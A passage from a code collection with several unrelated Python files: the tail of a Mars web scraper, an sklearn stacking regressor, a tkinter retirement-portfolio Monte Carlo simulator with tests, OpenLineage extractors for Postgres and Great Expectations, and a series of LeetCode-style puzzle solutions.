hemi_names: hemispheres.append(name.text) # Search for the names of all four hemispheres results = soup.find_all('div', class_="collapsible results") hemispheres = results[0].find_all('h3') # Get text and store in list for name in hemispheres: hemi_names.append(name.text) # Search for thumbnail links thumbnail_results = results[0].find_all('a') thumbnail_links = [] for thumbnail in thumbnail_results: # If the thumbnail element has an image... if (thumbnail.img): # then grab the attached link thumbnail_url = 'https://astrogeology.usgs.gov/' + thumbnail['href'] # Append list with links thumbnail_links.append(thumbnail_url) # --- Extract Image URLs --- full_imgs = [] for url in thumbnail_links: # Click through each thumbanil link browser.visit(url) html = browser.html soup = bs(html, 'html.parser') # Scrape each page for the relative image path results = soup.find_all('img', class_='wide-image') relative_img_path = results[0]['src'] # Combine the reltaive image path to get the full url img_link = 'https://astrogeology.usgs.gov/' + relative_img_path # Add full image links to a list full_imgs.append(img_link) # --- Zip together the list of hemisphere names and hemisphere image links --- mars_zip = zip(hemispheres, full_imgs) hemisphere_image_urls = [] # Iterate through the zipped object for title, img in mars_zip: mars_hemi_dict = {} # Add hemisphere title to dictionary mars_hemi_dict['title'] = title # Add image url to dictionary mars_hemi_dict['img_url'] = img # Append the list with dictionaries hemisphere_image_urls.append(mars_hemi_dict) # --- Store data in a dictionary --- mars_data = { "news_title": news_title, "news_paragraph": news_paragraph, "featured_image": feat_url, "mars_facts": mars_facts, "hemispheres": hemisphere_image_urls } # Close the browser after scraping browser.quit() # Return results return mars_data ```
{ "source": "josh-howes/sklearn-stacking", "score": 3 }
#### File: sklearn-stacking/ensemble/stacking_regressor.py ```python import numpy as np from sklearn.base import BaseEstimator, RegressorMixin, TransformerMixin, clone from sklearn.externals import six from sklearn.utils.validation import check_is_fitted from sklearn.linear_model import Lasso from sklearn.cross_validation import train_test_split from sklearn.externals.joblib import Parallel, delayed def _parallel_fit(estimator, X, y): fitted_estimator = clone(estimator).fit(X, y) return fitted_estimator class StackingRegressor(BaseEstimator, RegressorMixin, TransformerMixin): """Stacked Generalization (Stacking) Model. Parameters ---------- estimators : list of regressors Invoking the ``fit`` method on the ``StackingRegressor`` will fit clones of those original estimators that will be stored in the class attribute `self.estimators_`. combiner : regressor or None, optional (default=None) The base regresor to fit on a test train split of the estimators predictions. If None, then the base estimator is a linear regressor model. cross_val_test_size : float, optional (default=0.33) random_state : int or None, optional (default=None) Attributes ---------- estimators_ : list of regressors The collection of fitted sub-estimators. combiner_ : regressor Fitted combining regressor. """ def __init__(self, estimators, combiner=None, cross_val_test_size=0.33, random_state=None): self.estimators = estimators self.combiner = combiner self.cross_val_test_size = cross_val_test_size self.random_state = random_state def fit(self, X, y): """ Fit the estimators. Parameters ---------- X : {array-like, sparse matrix}, shape = [n_samples, n_features] Training vectors, where n_samples is the number of samples and n_features is the number of features. y : array-like, shape = [n_samples] Target values. Returns ------- self : object """ if self.estimators is None or len(self.estimators) == 0: raise AttributeError('Invalid `estimators` attribute, `estimators`' ' should be a list of estimators.') if self.combiner is None: # Normalizing and contraining coefficients to postive numbers helps with multilinearity self.combiner = Lasso(alpha=1e-9, positive=True, fit_intercept=False, normalize=True) if not isinstance(self.combiner, RegressorMixin): raise AttributeError('Invalid `combiner` attribute, `combiner`' ' should be an instance of a regressor.') X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=self.cross_val_test_size, random_state=self.random_state) n_estimators = len(self.estimators) self.estimators_ = Parallel(n_jobs=n_estimators)( delayed(_parallel_fit)( estimator, X_train, y_train ) for estimator in self.estimators) X_stack = np.asarray([estimator.predict(X_test) for estimator in self.estimators_]).T self.combiner_ = self.combiner.fit(X_stack, y_test) return self def predict(self, X): """ Predict class labels for X. Parameters ---------- X : {array-like, sparse matrix}, shape = [n_samples, n_features] Training vectors, where n_samples is the number of samples and n_features is the number of features. Returns ---------- predictions : array-like, shape = [n_samples] Regressed values """ check_is_fitted(self, 'estimators_') check_is_fitted(self, 'combiner_') X_stack = np.asarray([estimator.predict(X) for estimator in self.estimators_]).T return self.combiner_.predict(X_stack) def transform(self, X): """Return class labels or probabilities for X for each estimator. Parameters ---------- X : {array-like, sparse matrix}, shape = [n_samples, n_features] Training vectors, where n_samples is the number of samples and n_features is the number of features. Returns ------- array-like = [n_classifiers, n_samples] Class labels predicted by each classifier. """ check_is_fitted(self, 'estimators_') check_is_fitted(self, 'combiner_') return self.predict(X) def get_params(self, deep=False): """Return estimator parameter names for GridSearch support""" if not deep: return super(StackingRegressor, self).get_params(deep=False) else: # TODO: this will not work, need to implement `named_estimators` raise NotImplementedError("`deep` attribute not yet supported.") out = super(StackingRegressor, self).get_params(deep=False) out.update(self.named_estimators.copy()) for name, step in six.iteritems(self.named_estimators): for key, value in six.iteritems(step.get_params(deep=True)): out['%s__%s' % (name, key)] = value return out ```
{ "source": "JoshHumpherey/Financial_Calculators", "score": 4 }
#### File: JoshHumpherey/Financial_Calculators/investment_growth.py ```python import tkinter as tk import random import matplotlib import time from functools import wraps import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg matplotlib.use('TkAgg') FIELDS = ('Annual Contribution','Annual Increase (In $)','Current Age', 'Retirement Age', 'Current Portfolio Value', 'Percent in Stocks (vs. Bonds)', 'Inflation') AGE_SPREAD = [15] STOCK_ALLOCATION = [] CURRENT_YEAR = 2018 STRATEGIES = {'Fixed Allocations', 'Shifting Bond Allocations'} OFFSET = 1872 STOCK_MAP = dict() BOND_MAP = dict() with open('stock_history.txt') as stock_file: STOCK_DATA = stock_file.readlines() for year in range(OFFSET, CURRENT_YEAR-1): STOCK_MAP[year] = STOCK_DATA[year-OFFSET] with open('bond_history.txt') as bond_file: BOND_DATA = bond_file.readlines() for year in range(OFFSET, CURRENT_YEAR-1): BOND_MAP[year] = BOND_DATA[year-OFFSET] class Results: """ The Results class holds the data from a signle simulation instance. """ def __init__(self, simulation_number, final_balance, growth_history): self.simulation_number = simulation_number self.final_balance = final_balance self.growth_history = growth_history class Investor: """ The Investor class holds information that the user enters about themselves. """ def __init__(self, entries): self.contribution = (float(entries['Annual Contribution'].get())) self.current_age = (int(entries['Current Age'].get())) self.retirement_age = (int(entries['Retirement Age'].get())) self.starting_value = (float(entries['Current Portfolio Value'].get())) self.stock_percentage = float(entries['Percent in Stocks (vs. Bonds)'].get())/100 self.contribution_increase = float(entries['Annual Increase (In $)'].get()) self.inflation = float(entries['Inflation'].get())/100 self.investment_timeline = int(self.retirement_age-self.current_age) def get_final_balance(obj): """ Takes in the data from a year and returns it's final balance. """ return obj.final_balance def calculate_portfolio(entries, results_array): """ This is currently the main method for the program. It uses nested while loops to simulate an investors lifetime (inner loop) a certain number of times (outer loop) and then output and graph the results. """ investor_values = Investor(entries) STOCK_ALLOCATION.append(investor_values.stock_percentage) portfolio_spread = [investor_values.starting_value] balance = float(portfolio_spread[0]) matrix_length = investor_values.retirement_age - investor_values.current_age matrix_height = 10000 data_matrix = create_matrix(matrix_length, matrix_height) base_contribution = investor_values.contribution for sim_count in range(10000): iteration_age = investor_values.current_age iteration_balance = balance length_offset = investor_values.current_age investor_values.contribution = base_contribution for i in range(iteration_age, investor_values.retirement_age+1): current_year_tuple = get_yearly_information(investor_values) iteration_balance = update_balance(iteration_balance, investor_values.contribution, current_year_tuple) investor_values.contribution += investor_values.contribution_increase data_matrix[sim_count][i-length_offset-1] = iteration_balance result_object = Results(sim_count, data_matrix[sim_count][iteration_age-length_offset-1], data_matrix[sim_count][:]) results_array.append(result_object) quartile_tuple = get_quartile_data(10000) plot_trendlines(quartile_tuple, results_array) display_capital(investor_values.investment_timeline, investor_values.contribution, investor_values.starting_value) def update_balance(iteration_balance, contribution, current_year_tuple): """ Takes in a single year's data during a single simulation and updates the balance. """ STOCK_RATE = 0 BOND_RATE = 1 STOCK_PCT = 2 iteration_balance = iteration_balance + contribution stock_balance = iteration_balance * current_year_tuple[STOCK_PCT] bond_balance = iteration_balance * (1-current_year_tuple[STOCK_PCT]) stock_balance += (stock_balance * current_year_tuple[STOCK_RATE]) bond_balance += (bond_balance * current_year_tuple[BOND_RATE]) #print("Portfolio started at " + str(iteration_balance) + " and after a year of " + str(current_year_tuple[STOCK_RATE]) + " change it is now at: " + str(stock_balance + bond_balance)) iteration_balance = stock_balance + bond_balance return iteration_balance def get_quartile_data(number_of_simulations): """ Take in the number of simulations and output the quartile line numbers. """ std_increment = round(number_of_simulations/100) lower_quartile = round(std_increment*25) middle_quartile = round(std_increment*50) upper_quartile = round((std_increment*75)) quartile_tuple = (lower_quartile, middle_quartile, upper_quartile) return quartile_tuple def plot_trendlines(quartile_tuple, results_array): """ Take in the line numbers to plot and output a plot of those lines. """ plt.clf() LOWER = 0 MID = 1 UPPER = 2 sorted_results = sorted(results_array, key=get_final_balance) plt.xlabel('Years of Growth') plt.ylabel('Portfolio Value') plt.title('Investment Growth Calculator') smooth_lower = smooth_trendlines(quartile_tuple[LOWER], 100, sorted_results) smooth_middle = smooth_trendlines(quartile_tuple[MID], 100, sorted_results) smooth_upper = smooth_trendlines(quartile_tuple[UPPER], 100, sorted_results) plt.plot(smooth_lower) plt.plot(smooth_middle) plt.plot(smooth_upper) lower_result = round(smooth_lower[-1]) middle_result = round(smooth_middle[-1]) upper_result = round(smooth_upper[-1]) lower_string = str(format(lower_result, ",d")) middle_string = str(format(middle_result, ",d")) upper_string = str(format(upper_result, ",d")) results_string = (" Bottom Quartile: $" + lower_string + " * Middle Quartile: $" + middle_string + " * Upper Quartile: $" + upper_string + " ") PERFORMANCE_VAR.set(results_string) def display_capital(investment_length, added_yearly, initial_capital): total_capital = round(initial_capital + (investment_length*added_yearly)) formatted_capital = str(format(total_capital, ",d")) results_string = ("Total Invesment Capital: $" + formatted_capital) CAPITAL_VAR.set(results_string) def smooth_trendlines(n_quartile, smooth_amount, sorted_results): """ This averages the results of a quartile against it's neighbours. """ half = (smooth_amount) // 2 my_line = sorted_results[n_quartile].growth_history for line in range(n_quartile-half, n_quartile+half): other_line = sorted_results[line].growth_history for i in range(len(my_line)): my_line[i] += other_line[i] for i in range(len(my_line)): my_line[i] /= smooth_amount return my_line def create_matrix(length, height): """ Creates a matrix to store data in using a certain length and height. """ matrix = [[0 for x in range(length)] for y in range(height)] return matrix def get_yearly_information(investor_information): """ This function grabs stock/bond data from a random year. """ random_year = random.randint(1872, CURRENT_YEAR-2) inflation = investor_information.inflation stock_rate = float(STOCK_MAP[random_year]) bond_rate = float(BOND_MAP[random_year]) stock_percentage = float(STOCK_ALLOCATION[0]) year_tuple = (stock_rate-int(inflation), bond_rate-int(inflation), stock_percentage) return year_tuple def create_form(ROOT): """ This creates the main form using tkinter. """ create_initial_figure() create_performance_text() ents = make_form(ROOT, FIELDS) create_buttons(ents) ROOT.wm_iconbitmap('images/money.ico') def create_initial_figure(): """ This creates the graph on which the results are ploted. """ fig = plt.figure(1) plt.ion() plt.xlabel('Years of Growth') plt.ylabel('Portfolio Value') plt.title('Investment Growth Calculator') canvas = FigureCanvasTkAgg(fig, master=ROOT) plot_widget = canvas.get_tk_widget() plot_widget.pack() def make_form(ROOT, FIELDS): """ This takes our FIELDS parameter and generates text boxes from them. """ entries = {} for field in FIELDS: row = tk.Frame(ROOT) lab = tk.Label(row, width=22, text=field+": ", anchor='w') ent = tk.Entry(row) ent.insert(0, "0") row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5) lab.pack(side=tk.LEFT) ent.pack(side=tk.RIGHT, expand=tk.YES, fill=tk.X) entries[field] = ent return entries def create_buttons(ents): """ This creates the buttons a user can interact with. """ button_2 = tk.Button(ROOT, text='Quit', command=ROOT.quit) button_2.pack(side=tk.BOTTOM, padx=5, pady=5) button_1 = tk.Button(ROOT, text='Calculate', command=(lambda e=ents: calculate_portfolio(e, []))) button_1.pack(side=tk.BOTTOM, padx=5, pady=5) def create_performance_text(): """ This creates the text describing how each of the quartiles ended up. """ global PERFORMANCE_VAR global CAPITAL_VAR PERFORMANCE_VAR = tk.StringVar() PERFORMANCE_VAR.set("") performance_label = tk.Label(textvariable=PERFORMANCE_VAR, font=(None, 15)) performance_label.pack(side=tk.TOP) CAPITAL_VAR = tk.StringVar() CAPITAL_VAR.set("") capital_label = tk.Label(textvariable=CAPITAL_VAR, font=(None, 15)) capital_label.pack(side=tk.TOP) if __name__ == '__main__': ROOT = tk.Tk() ROOT.wm_title("Portfolio Growth Estimator") create_form(ROOT) ROOT.mainloop() ``` #### File: JoshHumpherey/Financial_Calculators/pytests.py ```python import unittest from unittest.mock import patch import investment_growth class InvestmentGrowthTests(unittest.TestCase): """ Unit tests for investment_growth.py """ def test_get_quartile_data(self): """ This tests to make sure that the quartiles are divded correctly. """ LOWER = 0 MID = 1 UPPER = 2 number_of_simulations = 100 expected_lower = 25 expected_middle = 50 expected_upper = 75 quartile_tuple = investment_growth.get_quartile_data(number_of_simulations) self.assertEqual(expected_lower, quartile_tuple[LOWER]) self.assertEqual(expected_middle, quartile_tuple[MID]) self.assertEqual(expected_upper, quartile_tuple[UPPER]) def test_update_balance(self): """ Test to make sure the investor balance updates correctly. """ current_year_tuple = (0.1, 0.1, 0.8) iteration_balance = 90 contribution = 10 expected_result = 110 test_balance = investment_growth.update_balance(iteration_balance, contribution, current_year_tuple) self.assertEqual(test_balance, expected_result) def test_create_matrix(self): """ Tests to make sure matrices are correctly created. """ test_matrix = investment_growth.create_matrix(5, 2) self.assertEqual(0, test_matrix[1][4]) with self.assertRaises(Exception): test_matrix[2][5] if __name__ == '__main__': unittest.main() ```
{ "source": "joshi95/OpenLineage", "score": 2 }
#### File: airflow/extractors/postgres_extractor.py ```python from contextlib import closing from typing import Optional from urllib.parse import urlparse from airflow.hooks.postgres_hook import PostgresHook from airflow.operators.postgres_operator import PostgresOperator from openlineage.airflow.utils import get_normalized_postgres_connection_uri, get_connection from openlineage.airflow.extractors.base import ( BaseExtractor, StepMetadata ) from openlineage.common.models import ( DbTableName, DbTableSchema, DbColumn ) from openlineage.common.sql import SqlMeta, SqlParser from openlineage.common.dataset import Source, Dataset _TABLE_SCHEMA = 0 _TABLE_NAME = 1 _COLUMN_NAME = 2 _ORDINAL_POSITION = 3 # Use 'udt_name' which is the underlying type of column # (ex: int4, timestamp, varchar, etc) _UDT_NAME = 4 class PostgresExtractor(BaseExtractor): operator_class = PostgresOperator default_schema = 'public' def __init__(self, operator): super().__init__(operator) self.conn = None def extract(self) -> StepMetadata: # (1) Parse sql statement to obtain input / output tables. sql_meta: SqlMeta = SqlParser.parse(self.operator.sql, self.default_schema) # (2) Get database connection self.conn = get_connection(self._conn_id()) # (3) Default all inputs / outputs to current connection. # NOTE: We'll want to look into adding support for the `database` # property that is used to override the one defined in the connection. source = Source( scheme=self._get_scheme(), authority=self._get_authority(), connection_url=self._get_connection_uri() ) database = self.operator.database if not database: database = self._get_database() # (4) Map input / output tables to dataset objects with source set # as the current connection. We need to also fetch the schema for the # input tables to format the dataset name as: # {schema_name}.{table_name} inputs = [ Dataset.from_table( source=source, table_name=in_table_schema.table_name.name, schema_name=in_table_schema.schema_name, database_name=database ) for in_table_schema in self._get_table_schemas( sql_meta.in_tables ) ] outputs = [ Dataset.from_table_schema( source=source, table_schema=out_table_schema, database_name=database ) for out_table_schema in self._get_table_schemas( sql_meta.out_tables ) ] return StepMetadata( name=f"{self.operator.dag_id}.{self.operator.task_id}", inputs=[ds.to_openlineage_dataset() for ds in inputs], outputs=[ds.to_openlineage_dataset() for ds in outputs], context={ 'sql': self.operator.sql } ) def _get_connection_uri(self): return get_normalized_postgres_connection_uri(self.conn) def _get_scheme(self): return 'postgres' def _get_database(self) -> str: if self.conn.schema: return self.conn.schema else: parsed = urlparse(self.conn.get_uri()) return f'{parsed.path}' def _get_authority(self) -> str: if self.conn.host and self.conn.port: return f'{self.conn.host}:{self.conn.port}' else: parsed = urlparse(self.conn.get_uri()) return f'{parsed.hostname}:{parsed.port}' def _conn_id(self): return self.operator.postgres_conn_id def _information_schema_query(self, table_names: str) -> str: return f""" SELECT table_schema, table_name, column_name, ordinal_position, udt_name FROM information_schema.columns WHERE table_name IN ({table_names}); """ def _get_hook(self): return PostgresHook( postgres_conn_id=self.operator.postgres_conn_id, schema=self.operator.database ) def _get_table_schemas( self, table_names: [DbTableName] ) -> [DbTableSchema]: # Avoid querying postgres by returning an empty array # if no table names have been provided. if not table_names: return [] # Keeps tack of the schema by table. schemas_by_table = {} hook = self._get_hook() with closing(hook.get_conn()) as conn: with closing(conn.cursor()) as cursor: table_names_as_str = ",".join(map( lambda name: f"'{name.name}'", table_names )) cursor.execute( self._information_schema_query(table_names_as_str) ) for row in cursor.fetchall(): table_schema_name: str = row[_TABLE_SCHEMA] table_name: DbTableName = DbTableName(row[_TABLE_NAME]) table_column: DbColumn = DbColumn( name=row[_COLUMN_NAME], type=row[_UDT_NAME], ordinal_position=row[_ORDINAL_POSITION] ) # Attempt to get table schema table_key: str = f"{table_schema_name}.{table_name}" table_schema: Optional[DbTableSchema] = schemas_by_table.get(table_key) if table_schema: # Add column to existing table schema. schemas_by_table[table_key].columns.append(table_column) else: # Create new table schema with column. schemas_by_table[table_key] = DbTableSchema( schema_name=table_schema_name, table_name=table_name, columns=[table_column] ) return list(schemas_by_table.values()) ``` #### File: provider/great_expectations/action.py ```python import logging import os from collections import defaultdict from datetime import datetime from typing import Optional, List from urllib.parse import urlparse from uuid import uuid4 from great_expectations.checkpoint import ValidationAction from great_expectations.core import ExpectationSuiteValidationResult from great_expectations.data_context.types.resource_identifiers import ValidationResultIdentifier from great_expectations.dataset import SqlAlchemyDataset, PandasDataset, Dataset as GEDataset from openlineage.client import OpenLineageClient, OpenLineageClientOptions from openlineage.client.facet import ParentRunFacet, DocumentationJobFacet, \ SourceCodeLocationJobFacet, DataQualityMetricsInputDatasetFacet, ColumnMetric from openlineage.client.run import RunEvent, RunState, Run, Job from sqlalchemy import MetaData, Table from sqlalchemy.engine import Connection from openlineage.client.serde import Serde from openlineage.common.dataset import Dataset, Source, Field from openlineage.common.dataset import Dataset as OLDataset from openlineage.common.provider.great_expectations.facets import \ GreatExpectationsAssertionsDatasetFacet, \ GreatExpectationsRunFacet from openlineage.common.provider.great_expectations.results import EXPECTATIONS_PARSERS, \ COLUMN_EXPECTATIONS_PARSER, \ GreatExpectationsAssertion from openlineage.common.sql import SqlParser class OpenLineageValidationAction(ValidationAction): """ ValidationAction implementation which posts RunEvents for a GreatExpectations validation job. Openlineage host parameters can be passed in as constructor arguments or environment variables will be searched. Job information can optionally be passed in as constructor arguments or the great expectations suite name and batch identifier will be used as the job name (the namespace should be passed in as either a constructor arg or as an environment variable). The data_asset will be inspected to determine the dataset source- SqlAlchemy datasets and Pandas datasets are supported. SqlAlchemy datasets are typically treated as other SQL data sources in OpenLineage. The database host and database name are treated as the data "source" and the schema + table are treated as the table name. Columns are fetched when possible and the schema will be posted as a facet. Some special handling for Bigquery is included, as "bigquery" is always the data source, while the table name consists of "project.dataset.table". Both the GreatExpectationsAssertionsDatasetFacet and DataQualityDatasetFacet are attached to *each* dataset found in the data_asset (this includes tables that are joined in a `custom_sql` argument). The DataQualityDatasetFacet is also posted as the more standard OpenLineage DataQualityMetricsInputDatasetFacet. The resulting RunEvent is returned from the _run method, so it can be seen in the actions_results field of the validation results. """ def __init__(self, data_context, openlineage_host=None, openlineage_namespace=None, openlineage_apiKey=None, openlineage_parent_run_id=None, openlineage_parent_job_namespace=None, openlineage_parent_job_name=None, job_name=None, job_description=None, code_location=None, openlineage_run_id=None, do_publish=True): super().__init__(data_context) if openlineage_host is not None: self.openlineage_client = OpenLineageClient(openlineage_host, OpenLineageClientOptions( api_key=openlineage_apiKey)) else: self.openlineage_client = OpenLineageClient.from_environment() if openlineage_namespace is not None: self.namespace = openlineage_namespace else: self.namespace = os.getenv('OPENLINEAGE_NAMESPACE', 'default') if openlineage_run_id is not None: self.run_id = openlineage_run_id else: self.run_id = uuid4() self.parent_run_id = openlineage_parent_run_id self.parent_job_namespace = openlineage_parent_job_namespace self.parent_job_name = openlineage_parent_job_name self.job_name = job_name self.job_description = job_description self.code_location = code_location self.do_publish = do_publish def _run(self, validation_result_suite: ExpectationSuiteValidationResult, validation_result_suite_identifier: ValidationResultIdentifier, data_asset: GEDataset, payload=None): # Initialize logger here so that the action is serializable until it actually runs self.log = logging.getLogger(self.__class__.__module__ + '.' + self.__class__.__name__) datasets = [] if isinstance(data_asset, SqlAlchemyDataset): datasets = self._fetch_datasets_from_sql_source(data_asset, validation_result_suite) elif isinstance(data_asset, PandasDataset): datasets = self._fetch_datasets_from_pandas_source(data_asset, validation_result_suite) run_facets = {} if self.parent_run_id is not None: run_facets.update({"parentRun": ParentRunFacet.create( self.parent_run_id, self.parent_job_namespace, self.parent_job_name )}) run_facets.update( {"great_expectations_meta": GreatExpectationsRunFacet(**validation_result_suite.meta)}) job_facets = {} if self.job_description: job_facets.update({ "documentation": DocumentationJobFacet(self.job_description) }) if self.code_location: job_facets.update({ "sourceCodeLocation": SourceCodeLocationJobFacet("", self.code_location) }) job_name = self.job_name if self.job_name is None: job_name = validation_result_suite.meta["expectation_suite_name"] + '.' \ + validation_result_suite_identifier.batch_identifier run_event = RunEvent( eventType=RunState.COMPLETE, eventTime=datetime.now().isoformat(), run=Run(runId=str(self.run_id), facets=run_facets), job=Job(self.namespace, job_name, facets=job_facets), inputs=datasets, outputs=[], producer="https://github.com/OpenLineage/OpenLineage/tree/$VERSION/integration/common/openlineage/provider/great_expectations" # noqa ) if self.do_publish: self.openlineage_client.emit(run_event) # Great expectations tries to append stuff here, so we need to make it a dict return Serde.to_dict(run_event) def _fetch_datasets_from_pandas_source(self, data_asset: PandasDataset, validation_result_suite: ExpectationSuiteValidationResult) -> List[OLDataset]: # noqa """ Generate a list of OpenLineage Datasets from a PandasDataset :param data_asset: :param validation_result_suite: :return: """ if data_asset.batch_kwargs.__contains__("path"): path = data_asset.batch_kwargs.get("path") if path.startswith("/"): path = "file://{}".format(path) parsed_url = urlparse(path) columns = [Field( name=col, type=str(data_asset[col].dtype) if data_asset[col].dtype is not None else 'UNKNOWN' ) for col in data_asset.columns] return [ Dataset( source=self._source(parsed_url._replace(path='')), name=parsed_url.path, fields=columns, input_facets=self.results_facet(validation_result_suite) ).to_openlineage_dataset() ] def _fetch_datasets_from_sql_source(self, data_asset: SqlAlchemyDataset, validation_result_suite: ExpectationSuiteValidationResult) -> List[OLDataset]: # noqa """ Generate a list of OpenLineage Datasets from a SqlAlchemyDataset. :param data_asset: :param validation_result_suite: :return: """ metadata = MetaData() if data_asset.generated_table_name is not None: custom_sql = data_asset.batch_kwargs.get('query') parsed_sql = SqlParser.parse(custom_sql) return [ self._get_sql_table(data_asset, metadata, t.schema, t.name, validation_result_suite) for t in parsed_sql.in_tables ] return [self._get_sql_table(data_asset, metadata, data_asset._table.schema, data_asset._table.name, validation_result_suite)] def _get_sql_table(self, data_asset: SqlAlchemyDataset, meta: MetaData, schema: str, table_name: str, validation_result_suite: ExpectationSuiteValidationResult) -> Optional[OLDataset]: # noqa """ Construct a Dataset from the connection url and the columns returned from the SqlAlchemyDataset :param data_asset: :return: """ engine = data_asset.engine if isinstance(engine, Connection): engine = engine.engine datasource_url = engine.url if engine.dialect.name.lower() == "bigquery": schema = '{}.{}'.format(datasource_url.host, datasource_url.database) table = Table(table_name, meta, autoload_with=engine) fields = [Field( name=key, type=str(col.type) if col.type is not None else 'UNKNOWN', description=col.doc ) for key, col in table.columns.items()] name = table_name \ if schema is None \ else "{}.{}".format(schema, table_name) results_facet = self.results_facet(validation_result_suite) return Dataset( source=self._source(urlparse(str(datasource_url))), fields=fields, name=name, input_facets=results_facet ).to_openlineage_dataset() def _source(self, url) -> Source: """ Construct a Source from the connection url. Special handling for BigQuery is included. We attempt to strip credentials from the connection url, if present. :param url: a parsed url, as returned from urlparse() :return: """ if url.scheme == "bigquery": return Source( scheme='bigquery', connection_url='bigquery' ) return Source( scheme=url.scheme, authority=url.hostname, # Remove credentials from the URL if present connection_url=url._replace(netloc=url.hostname, query=None, fragment=None).geturl() ) def results_facet(self, validation_result: ExpectationSuiteValidationResult): """ Parse the validation result and extract input facets based on the results. We'll return a DataQualityDatasetFacet, a GreatExpectationsAssertionsDatasetFacet, and a (openlineage standard) DataQualityMetricsInputDatasetFacet :param validation_result: :return: """ try: data_quality_facet = self.parse_data_quality_facet(validation_result) if not data_quality_facet: return None assertions_facet = self.parse_assertions(validation_result) if not assertions_facet: return None return { 'dataQuality': data_quality_facet, 'greatExpectations_assertions': assertions_facet, 'dataQualityMetrics': data_quality_facet } except ValueError: self.log.exception("Exception while retrieving great expectations dataset") return None def parse_data_quality_facet(self, validation_result: ExpectationSuiteValidationResult) \ -> Optional[DataQualityMetricsInputDatasetFacet]: """ Parse the validation result and extract a DataQualityDatasetFacet :param validation_result: :return: """ facet_data = { "columnMetrics": defaultdict(dict) } # try to get to actual expectations results try: expectations_results = validation_result['results'] for expectation in expectations_results: for parser in EXPECTATIONS_PARSERS: # accept possible duplication, should have no difference in results if parser.can_accept(expectation): result = parser.parse_expectation_result(expectation) facet_data[result.facet_key] = result.value for parser in COLUMN_EXPECTATIONS_PARSER: if parser.can_accept(expectation): result = parser.parse_expectation_result(expectation) facet_data['columnMetrics'][result.column_id][result.facet_key] \ = result.value for key in facet_data['columnMetrics'].keys(): facet_data['columnMetrics'][key] = ColumnMetric(**facet_data['columnMetrics'][key]) return DataQualityMetricsInputDatasetFacet(**facet_data) except ValueError: self.log.exception( "Great Expectations's CheckpointResult object does not have expected key" ) return None def parse_assertions(self, validation_result: ExpectationSuiteValidationResult) -> \ Optional[GreatExpectationsAssertionsDatasetFacet]: assertions = [] try: for expectation in validation_result.results: assertions.append(GreatExpectationsAssertion( expectationType=expectation['expectation_config']['expectation_type'], success=expectation['success'], column=expectation['expectation_config']['kwargs'].get('column', None) )) return GreatExpectationsAssertionsDatasetFacet(assertions) except ValueError: self.log.exception( "Great Expectations's CheckpointResult object does not have expected key" ) return None ```
{ "source": "joshiaj7/CodingChallenges", "score": 3 }
#### File: CodingChallenges/python3/add_binary.py ```python class Solution: def addBinary(self, a: str, b: str) -> str: res = '' len_a = len(a) len_b = len(b) store = 0 if len_a > len_b: b = ('0' * (len_a - len_b)) + b len_b = len_a elif len_a < len_b: a = ('0' * (len_b - len_a)) + a len_a = len_b for i in range(len_a-1, -1, -1): total = store + int(a[i]) + int(b[i]) if total < 2: store = 0 elif total >= 2: store = 1 res = str(total % 2) + res if store == 1: res = str(store) + res return res ``` #### File: CodingChallenges/python3/add_digits.py ```python class Solution: def addDigits(self, num: int) -> int: if num < 10: return num while len(str(num)) > 1: n = str(num) temp = 0 for i in n: temp += int(i) num = temp return num ``` #### File: CodingChallenges/python3/add_two_numbers.py ```python from .model import ListNode """ Space : O(1) Time : O(n) """ # Definition for singly-linked list. # class ListNode: # def __init__(self, val=0, next=None): # self.val = val # self.next = next class Solution: def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode: p1, p2 = l1, l2 v1, v2 = 0, 0 mul = 1 while p1: v1 = v1 + (p1.val * mul) mul *= 10 p1 = p1.next mul = 1 while p2: v2 = v2 + (p2.val * mul) mul *= 10 p2 = p2.next tot = str(v1 + v2) ans = ListNode(0) point = ans for i in range(len(tot)-1, -1, -1): point.next = ListNode(int(tot[i])) point = point.next return ans.next ``` #### File: CodingChallenges/python3/arithmetic_slices.py ```python class Solution: def numberOfArithmeticSlices(self, A: List[int]) -> int: ans = 0 temp = [] n = len(A) if n < 3: return 0 for i in range(1, n): temp.append(A[i] - A[i-1]) count = 0 for j in range(1, len(temp)): if temp[j] == temp[j-1]: count += 1 else: count = 0 ans += count return ans ``` #### File: CodingChallenges/python3/arrange_coins.py ```python class Solution: def arrangeCoins(self, n: int) -> int: ans, count = 0, 0 add = 1 while count < n: count += add add += 1 ans += 1 if count > n: ans -= 1 return ans ``` #### File: CodingChallenges/python3/asteroid_collision.py ```python class Solution: def asteroidCollision(self, asteroids: List[int]) -> List[int]: stack = [] for e in asteroids: if not stack or stack[-1] < 0 or e > 0: stack.append(e) else: flag = True while stack and stack[-1] > 0 and stack[-1] <= -e: tmp = stack.pop() if tmp == -e: flag = False break if (not stack or stack[-1] < 0) and flag: stack.append(e) return stack ``` #### File: CodingChallenges/python3/average_of_levels_in_binary_tree.py ```python class Solution: def averageOfLevels(self, root: TreeNode) -> List[float]: ans = [] stack = [root] while stack: val = 0 temp = [] for node in stack: val += node.val if node.left: temp.append(node.left) if node.right: temp.append(node.right) ans.append(val / len(stack)) stack = temp return ans ``` #### File: CodingChallenges/python3/bag_of_tokens.py ```python class Solution: def bagOfTokensScore(self, tokens: List[int], P: int) -> int: score = 0 n = len(tokens) dp = [0] * n tokens = sorted(tokens) s, e = 0, len(tokens)-1 while s <= e: if P - tokens[s] >= 0: P -= tokens[s] dp[s] += 1 s += 1 score += 1 else: if score > 0: cost = 0 while P < tokens[s]: P += tokens[e] score -= 1 cost += 1 e -= 1 if score == 0: break dp[s] -= cost else: break ans = 0 count = 0 for i in dp: count += i ans = max(ans, count) return ans ``` #### File: CodingChallenges/python3/beautiful_arrangement_II.py ```python class Solution: def constructArray(self, n: int, k: int) -> List[int]: s, e = 2, n ans = [1] while s <= e: if k > 1: if ans[-1] == s-1: ans.append(e) e -= 1 elif ans[-1] == e+1: ans.append(s) s += 1 k -= 1 else: if ans[-1] == s-1: ans.append(s) s += 1 elif ans[-1] == e+1: ans.append(e) e -= 1 return ans ``` #### File: CodingChallenges/python3/beautiful_arrangement.py ```python class Solution: def countArrangement(self, n: int) -> int: ans = 0 def dfs(i, cands): nonlocal ans if i <= 1: ans += 1 return for j, x in enumerate(cands): if i % x == 0 or x % i == 0: dfs(i-1, cands[:j] + cands[j+1:]) dfs(n, list(range(1, n+1))) return ans 